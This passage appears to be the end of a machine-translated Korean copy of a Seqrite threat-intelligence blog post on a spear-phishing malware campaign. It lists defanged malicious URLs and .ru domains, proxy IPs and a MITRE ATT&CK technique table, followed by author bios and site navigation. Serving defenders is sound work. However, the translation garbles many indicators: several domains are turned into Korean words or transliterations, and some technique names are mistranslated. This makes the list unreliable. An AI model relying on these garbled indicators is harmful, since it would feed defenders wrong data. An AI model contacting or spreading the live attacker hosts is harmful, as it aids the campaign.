hxxp://bti25.ru/openai.rtf
hxxp://bti25.ru/china.hta
hxxp://gemme-cotti.ru/mida.hta
hxxp://xn--e1ajbcejcefx.xn--p1ai/sflopytrgjklhfaseri
hxxp://emec.su/bg.rtf
hxxp://gemme-cotti.ru/cotti.docx
hxxp://gemme-cotti.ru/zibaba.hta
hxxps://ipgrabber.ru/penis.gif
hxxps://iplogger.ru/sugar.png
hxxp://ship-care.com/care.rtf
hxxp://krona77.ru/edr.hta
hxxps://update.ecols.ru:8443/jquery-3.3.1.slim.min.js
hxxps://incident.zilab.ru:8443/jquery-3.3.1.slim.min.js
hxxps://mcnn.ru:8443/jquery-3.3.1.slim.min.js
hxxp://poopy.aarkhipov.ru:8080/jquery-3.3.1.slim.min.js
hxxps://ekostroy33.ru/jquery-3.3.2.min.js
hxxp://order.edrennikov.ru/jquery-3.3.1.min.js
hxxps://cba.abc92.ru:8443/jquery-3.3.1.slim.min.js
hxxps://moscable77.ru:8443/jquery-3.3.1.slim.min.js
hxxp://forensics.jwork.ru/jquery-3.3.1.slim.min.js

도메인

업데이트.ecols[.]ru

사건.zilab[.]ru

mcnn[.]ru

order.edrennikov[.]ru

cba.abc92[.]ru

포렌식.jwork[.]ru

호스트바이넷[.]ru

moscable77[.]ru

gk-stst[.]ru

아쿠아콤플렉스[.]루

ezstat[.]ru

에코스트로이33[.]루

발리시[.]루

bsprofi[.]ru

이플리스[.]루

제타그[.]루

리에리[.]루

도징펌프[.]ru

에셋노드64[.]루

야드로[.]루

iplogger[.]ru

크로나77[.]루

bti25[.]ru

프록시 IP

45.147.14.106:62900 AS 49505 (JSC 셀렉텔) RU
45.145.91.164:64830 AS 49505 (JSC 셀렉텔) RU

MITRE TTP

술책 기술 ID 기술
초기 액세스 T1566.001 스피어피싱 첨부 파일
실행 T1204.002 사용자 실행: 악성 파일
실행 T1221 템플릿 주입
실행 T1059.003 명령 및 스크립팅 인터프리터: PowerShell
방어 회피 T1027 난독화/암호화된 파일 또는 정보
방어 회피 T1140 파일 또는 정보의 난독화/디코드
방어 회피 T1055 공정 주입
발견 T1082 시스템 정보 검색
발견 T1016 시스템 네트워크 구성 검색
명령 및 제어 T1105 인그레스 도구 전송
명령 및 제어 T1071.001 애플리케이션 계층 프로토콜: 웹 프로토콜
명령 및 제어 T1090 프록시/리디렉터 사용

작성자

  • 라야파티 락슈미 프라산나 사이
  • 사트윅 람 프라키

 

 이전 포스트250억 루피에 대한 의문: 인도의 DPDPA가 C를 어떻게 다시 쓸 것인가?
다음 포스트  해고를 주제로 한 사기성 HR 이메일, Remcos RAT 맬웨어 유포
라야파티 락슈미 프라산나 사이

라야파티 락쉬미 프라사나 사이(Prasanna Sai) 소개

라야파티 락슈미 프라산나 사이는 Quick Heal Security Lab의 보안 연구원입니다. 그녀의 관심사는 악성코드 분석과 리버스 엔지니어링입니다. 그녀의 이전...

Rayapati Lakshmi Prasanna Sai의 기사 »

관련 게시물

  • RTO 테마의 소셜 엔지니어링을 활용한 다단계 안드로이드 악성코드 캠페인의 내부 구조

    2026년 2월 4일
  • Operation DupeHike: UNG0902는 DUPERUNNER와 AdaptixC2를 이용해 러시아 직원을 표적으로 삼습니다.

    2026 년 1 월 20 일
  • 은밀한 접근 작전: 아르헨티나 사법 부문을 표적으로 삼은 LNK 기반 스피어 피싱 공격으로, 은밀한 RAT(원격 접속 트로이목마)를 배포하려 함

    은밀한 접근 작전: 아르헨티나 사법 부문을 표적으로 삼은 LNK 기반 스피어 피싱 공격으로, 은밀한 RAT(원격 접속 트로이목마)를 배포하려 함

    2026 년 1 월 19 일
추천 작가
  • 시크라이트
    시크라이트

    Seqrite는 선도적인 기업용 사이버 보안 솔루션 제공업체입니다.

    더 읽기 ..
  • 조티 칼레카르
    조티 칼레카르

    저는 새로운 기술과 관련된 콘텐츠를 만드는 것을 좋아하는 열렬한 작가입니다.

    더 읽기 ..
  • 비니쉬 P
    비니쉬 P

    저는 열정적인 사이버 보안 애호가이자 헌신적인 작가입니다. 재능을 가진...

    더 읽기 ..
  • 산제이 카트카르
    산제이 카트카르

    산제이 카트카르는 Quick Heal Technologies의 공동 전무이사입니다.

    더 읽기 ..
이상의 주제
적절한 (25) 사이버 공격 (36) 사이버 공격 (58) 사이버 공격 (16) 사이버 공격 (15) 사이버 보안 (335) 사이버 보안 (34) 사이버 위협 (33) 사이버 위협 (50) 데이터 위반 (56) 데이터 유출 (29) 데이터 손실 (28) 데이터 손실 방지 (34) 데이터 프라이버시 (15) 데이터 보호 (32) 데이터 보안 (17) DLP (50) DPDP (14) 디피디파 (16) 암호화 (16) 엔드 포인트 보안 (110) 엔터프라이즈 보안 (18) 공적 (13) GDPR (13) 악성 코드 (76) 악성 코드 분석 (13) 악성 코드 공격 (23) 맬웨어 공격 (12) MDM (27) Microsoft (15) 네트워크 보안 (24) 패치 관리 (12) 피싱 (29) 랜섬 (69) 중매 공격 (30) ransomware 공격 (30) 중매 보호 (14) 시크라이트 (41) Seqrite 암호화 (27) 시크라이트 EPS (33) Seqrite 서비스 (16) 그래프 기반 사이버 위협 인텔리전스 (13) UTM (34) 보안 문제 (16) 제로 트러스트 (13)
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite

전 세계적으로 최고 수준의 위협 예방, 탐지 및 대응 솔루션을 제공하여 엔드포인트, 데이터 및 네트워크 보안을 간소화하는 선도적인 기업 IT 보안 솔루션 제공업체입니다.

자세히 보기

우리를 따르십시오 :

우리의 뉴스 레터를 구독

최신 사이버보안 동향과 통찰력을 알아보세요.

로딩중
제품 & 서비스
  • 클라우드
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 모바일 장치 관리
  • BYOD
  • 확장 된 탐지 및 대응
  • 제로 트러스트 네트워크 액세스
  • 데이터 개인 정보
  • 온프레미스
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 데이터 개인 정보
  • 플랫폼
  • 악성코드 분석 플랫폼
  • 마이크로 비즈니스
  • SOHO 토탈 에디션
  • 서비스
  • 위협 인텔
  • 디지털 위험 보호 서비스(DRPS)
  • 랜섬웨어 복구 서비스(RRaaS)
  • DPDP 준수
  • 관리되는 탐지 및 대응
자료
  • 블로그
  • 백서
  • 데이터시트
  • 위협 보고서
  • 매뉴얼
  • POV
  • 데이터 개인 정보 보호 이해
  • DPDP 대화
  • 정책 및 규정 준수
  • EULA
  • 고딥.AI
  • SIA
문의하기
  • 등록 사무소
  • 가장 가까운 사무실
  • 사이버 보안에 대해 이야기해 봅시다
고객 지원
  • 기술 지원
  • 소프트웨어 다운로드
  • 오프라인 업데이터
  • 펌웨어 업그레이드
  • 업그레이드
  • 제품 설명서
~에 대한
  • Seqrite 소개
  • Leadership
  • 어워드 수상
  • 뉴스 편집실
되어보세요
  • 파트너 프로그램
  • 파트너 찾기
  • 파트너가 되십시오
  • Seqrite 인증

© 2026 퀵힐테크놀로지스 주식회사

사이트 맵 개인 정보 보호 정책 법적 고지 쿠키 정책 이용 약관